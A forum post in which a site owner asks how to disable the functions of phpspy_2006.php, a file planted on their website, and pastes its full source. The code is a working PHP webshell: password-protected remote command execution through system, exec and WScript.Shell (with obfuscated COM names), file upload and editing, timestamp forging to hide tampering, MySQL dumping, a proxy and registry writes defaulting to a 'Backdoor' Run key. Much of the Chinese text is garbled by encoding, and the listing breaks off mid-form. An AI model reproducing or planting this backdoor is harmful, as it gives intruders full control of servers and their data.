a24585814
2008-10-08, 10:50 AM
phpspy_2006.php 之前網站被植入這個 有沒有方法禁用此檔案的php函數?
原碼如下
<?php
/*
+--------------------------------------------------------------------------+
| str_replace(".", "", "P.h.p.S.p.y") Version:2006 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: [email protected] |
| Date: Mar 21st 2005 |
| Thx All The Fantasy of Wickedness's members |
| Thx FireFox (http://www.molyx.com) |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 最唗饜离 =====================*/
// 岆瘁剒猁躇鎢桄痐,1峈剒猁桄痐,坻杅趼峈眻諉輛.狟醱恁砐寀拸虴
$admin['check'] = "1";
// 彆剒猁躇鎢桄痐,党蜊腎翻躇鎢
$admin['pass'] = "307598989";
/*===================== 饜离賦旰 =====================*/
// 埰勍最唗婓 register_globals = off 腔遠噫狟馱釬
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 旯爺桄痐 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">蛁种傖髡......<p><a href=\"".$self."\">鏃綴赻雄豖堤麼等僻涴爵豖堤最唗賜醱 >>></a></span>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">腎翻傖髡......<p><a href=\"".$self."\">鏃綴赻雄泐蛌麼等僻涴爵輛最唗賜醱 >>></a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 桄痐賦旰 =====================*/
// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 脤艘PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 滲杅眒掩輦蚚,脤艘<PHP遠噫曹講>";
exit;
}
// 婓盄測燴
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>鳳 URL 囀囮啖</b></p></center></body>";
exit;
}
// 狟婥恅璃
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('斕猁狟腔恅璃祥湔婓!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 眻諉狟婥掘爺杅擂踱
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "堤渣: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 最唗醴翹
$pathname=str_replace('\\','/',dirname(__FILE__));
// 鳳絞繚噤
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 瓚剿黍迡錶
$dir_writeable = (dir_writeable($nowpath)) ? "褫迡" : "祥褫迡";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">蛁聊桶紱釬</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2006</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t) {
if (confirm(m)) {
if (t == 1) {
window.location.href='?dir='+d+'&deldir='+f;
} else {
window.location.href='?dir='+d+'&delfile='+f;
}
}
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?action=logout">蛁种頗趕</a> | <a href="?action=dir">殿隙PhpSpy醴翹</a> | <a href="?action=phpenv">PHP遠噫曹講</a> | <a href="?action=proxy">婓盄測燴</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>最唗繚噤: '.$pathname.'<br>絞醴翹('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>泐蛌醴翹: '.$tb->makeinput('dir').' '.$tb->makeinput('','隅','','submit').' □盓厥橈勤繚噤睿眈勤繚噤■'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'奻換恅璃善絞醴翹: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','隅','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'陔膘恅璃婓絞醴翹: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','隅','','submit')));
$tb->headerform(array('content'=>'陔膘醴翹婓絞醴翹: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','隅','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 硒俴紱釬 羲宎 =====================*/
echo "<p><b>\n";
// 刉壺恅璃
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 刉壺傖髡!" : "恅璃刉壺囮啖!";
} else {
echo basename($delfile)." 恅璃眒祥湔婓!";
}
}
// 刉壺醴翹
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 醴翹眒祥湔婓!";
} else {
echo (deltree($deldirs)) ? "醴翹刉壺傖髡!" : "醴翹刉壺囮啖!";
}
}
// 斐膘醴翹
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "蜆醴翹眒湔婓!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "斐膘醴翹傖髡!" : "斐膘囮啖!";
@chmod("$mkdirs",0777);
}
}
}
// 奻換恅璃
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "奻換傖髡!" : "奻換囮啖!";
}
// 晤憮恅璃
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "迡恅璃傖髡!" : "迡囮啖!";
@fclose($fp);
} else {
echo "怀砑猁晤憮腔恅璃靡!";
}
}
// 晤憮恅璃扽俶
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "扽俶党蜊傖髡!" : "党蜊囮啖!";
echo " 恅璃 ".$file." 党蜊綴腔扽俶峈: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "怀砑猁扢离腔扽俶!";
}
}
// 恅璃蜊靡
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 眒冪湔婓,笭陔怀珨跺!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 傖髡蜊靡峈 ".$_POST['newname']." !" : "恅璃靡党蜊囮啖!";
}
} else {
echo "怀砑猁蜊腔恅璃靡!";
}
}
// 親癒奀潔
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "猁党蜊腔恅璃祥湔婓!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "猁統桽腔恅璃祥湔婓!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 腔党蜊奀潔傖髡蜊峈 ".date("Y-m-d H:i:s",$time)." !" : "恅璃腔党蜊奀潔党蜊囮啖!";
}
}
}
// 赻隅砱奀潔
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "猁党蜊腔恅璃祥湔婓!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 腔党蜊奀潔傖髡蜊峈 ".date("Y-m-d H:i:s",$time)." !" : "恅璃腔党蜊奀潔党蜊囮啖!";
}
}
}
// 蟀諉MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "杅擂踱蟀諉傖髡!";
mysql_close();
} else {
echo mysql_error();
}
}
// 硒俴SQL逄曆
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL逄曆傖髡硒俴!" : "堤渣: ".mysql_error();
mysql_close();
}
// 掘爺紱釬
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "恁寁郗掘爺腔杅擂桶睿掘爺源宒!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "堤渣: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "杅擂踱眒傖髡掘爺善 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "掘爺囮啖,醴梓恅璃標岆瘁撿衄褫迡癹!";
}
}
}
}
// 湖婦狟婥 PS:恅璃怮湮褫夔準都鞣
// Thx : 苤豪
elseif($downrar) {
if (!empty($dl)) {
$dfiles="";
foreach ($dl AS $filepath=>$value) {
$dfiles.=$filepath.",";
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(",",$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
echo $code;
exit;
} else {
echo "恁寁猁湖婦狟婥腔恅璃!";
}
}
// Shell.Application 堍俴最唗
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "最唗眒冪傖髡硒俴!" : "最唗堍俴囮啖!";
}
// 脤艘PHP饜离統杅袨錶
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "饜离統杅 ".$_POST['phpvarname']." 潰聆賦彆: ".getphpcfg($_POST['phpvarname'])."";
}
// 黍蛁聊桶
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 迡蛁聊桶
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "迡蛁聊桶翩硉傖髡!" : "迡 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 囮啖!";
}
// 刉壺蛁聊桶
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "刉壺蛁聊桶翩硉傖髡!" : "刉壺 ".$_POST['delregname']." 囮啖!";
}
else {
echo "掛最唗蚕 <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> 苤郪 angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] 黃蕾羲楷,褫婓 <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> 狟婥郔陔唳掛.";
}
echo "</b></p>\n";
/*===================== 硒俴紱釬 賦旰 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>恅璃</b></td>
<td align="center" nowrap width="16%"><b>斐膘</b></td>
<td align="center" nowrap width="16%"><b>郔綴党蜊</b></td>
<td align="center" nowrap width="11%"><b>湮苤</b></td>
<td align="center" nowrap width="6%"><b>扽俶</b></td>
<td align="center" nowrap width="24%"><b>紱釬</b></td>
</tr>
<?php
// 醴翹蹈桶
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><dir></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','斕隅猁刉壺 $file 醴翹鎘? \\n\\n彆蜆醴翹準諾,森棒紱釬蔚頗刉壺蜆醴翹狟腔垀衄恅璃!','1')\">刉壺</a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">殿隙奻撰醴翹</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 恅璃蹈桶
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">";
echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">狟婥</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">晤憮</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','斕隅猁刉壺 $file 恅璃鎘?','2')\">刉壺</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">蜊靡</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">奀潔</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','恁笢恅璃湖婦狟婥','','submit').'</td><td align="right">'.$dir_i.' 跺醴翹 / '.$file_i.' 跺恅璃</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'陔膘/晤憮恅璃');
$tb->tdbody('絞恅璃: '.$tb->makeinput('editfilename',$filename).' 怀陔恅璃靡寀膘蕾陔恅璃');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'党蜊恅璃靡');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('絞恅璃靡: '.basename($nowfile));
$tb->tdbody('蜊靡峈: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'党蜊恅璃扽俶');
$tb->tdbody('党蜊 '.$file.' 腔扽俶峈: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'親癒恅璃郔綴党蜊奀潔');
$tb->tdbody("党蜊恅璃: ".$tb->makeinput('curfile',$file,'readonly')." ↙ 醴梓恅璃: ".$tb->makeinput('tarfile','剒沓俇淕繚噤摯恅璃靡'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'赻隅砱恅璃郔綴党蜊奀潔');
$tb->tdbody('<br><ul><li>衄虴腔奀潔期萎倰毓峓岆植跡輿哏笥奀潔 1901 爛 12 堎 13 陎拻 20:45:54 善 2038爛 1 堎 19 陎媼 03:14:07<br>(蜆跦擂 32 弇衄睫瘍淕杅腔郔苤硉睿郔湮硉奧懂)</li><li>佽隴: 01 善 30 眳潔, 奀 0 善 24 眳潔, 煦睿鏃 0 善 60 眳潔!</li></ul>','left');
$tb->tdbody('絞恅璃靡: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('党蜊峈: '.$tb->makeinput('year','1984','','text','4').' 爛 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 堎 '.$tb->makeinput('data','18','','text','2').' '.$tb->makeinput('hour','20','','text','2').' 奀 '.$tb->makeinput('minute','00','','text','2').' 煦 '.$tb->makeinput('second','00','','text','2').' 鏃','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('拸隙珆堍俴最唗 ↙ 恅璃: '.$tb->makeinput('program',$program).' 統杅: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('枑尨:彆怀堤賦彆祥俇,膘祜參怀堤賦彆迡恅璃.涴欴褫眕腕善窒囀.');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->tdbody('恁寁硒俴滲杅: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 怀韜鍔: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
}//end shell
elseif ($_GET['action'] == "reg") {
$action = '?action=reg';
$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
$delregname = $_POST['delregname'];
$tb->tableheader();
$tb->formheader($action,'黍蛁聊桶');
$tb->tdbody('瑩硉: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','黍','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'迡蛁聊桶');
$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
$tb->tdbody('瑩硉: '.$tb->makeinput('writeregname',$registre,'','text','56').' 濬倰: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 硉: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','迡','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'刉壺蛁聊桶');
$tb->tdbody('瑩硉: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','刉壺','','submit'),'center','2','50');
echo "</form>";
$tb->tablefooter();
}//end reg
elseif ($_GET['action'] == "proxy") {
$action = '?action=proxy';
$tb->tableheader();
$tb->formheader($action,'婓盄測燴','proxyframe');
$tb->tdbody('<br><ul><li>蚚掛髡夔躺妗珋潠等腔 HTTP 測燴,祥頗珆尨妏蚚眈勤繚噤腔芞﹜蟈諉摯CSS欴宒桶.</li><li>蚚掛髡夔褫眕籵徹掛督昢銡擬醴梓URL,筍祥盓厥 SQL Injection 抻聆眕摯議虳杻忷趼睫.</li><li>蚚掛髡夔銡擬腔 URL,婓醴梓翋儂奻隱狟腔IP暮翹岆 : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
$tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','銡擬','','submit'),'center','1','40');
$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
echo "</form>";
$tb->tablefooter();
}//end proxy
elseif ($_GET['action'] == "sql") {
$action = '?action=sql';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$sql_query = $_POST['sql_query'];
$tb->tableheader();
$tb->formheader($action,'硒俴 SQL 逄曆');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','蟀諉','','submit'));
$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
$tb->makehidden('do','query');
$tb->formfooter('1','30');
}//end sql query
elseif ($_GET['action'] == "sqlbak") {
$action = '?action=sqlbak';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$tb->tableheader();
$tb->formheader($action,'掘爺 MySQL 杅擂踱');
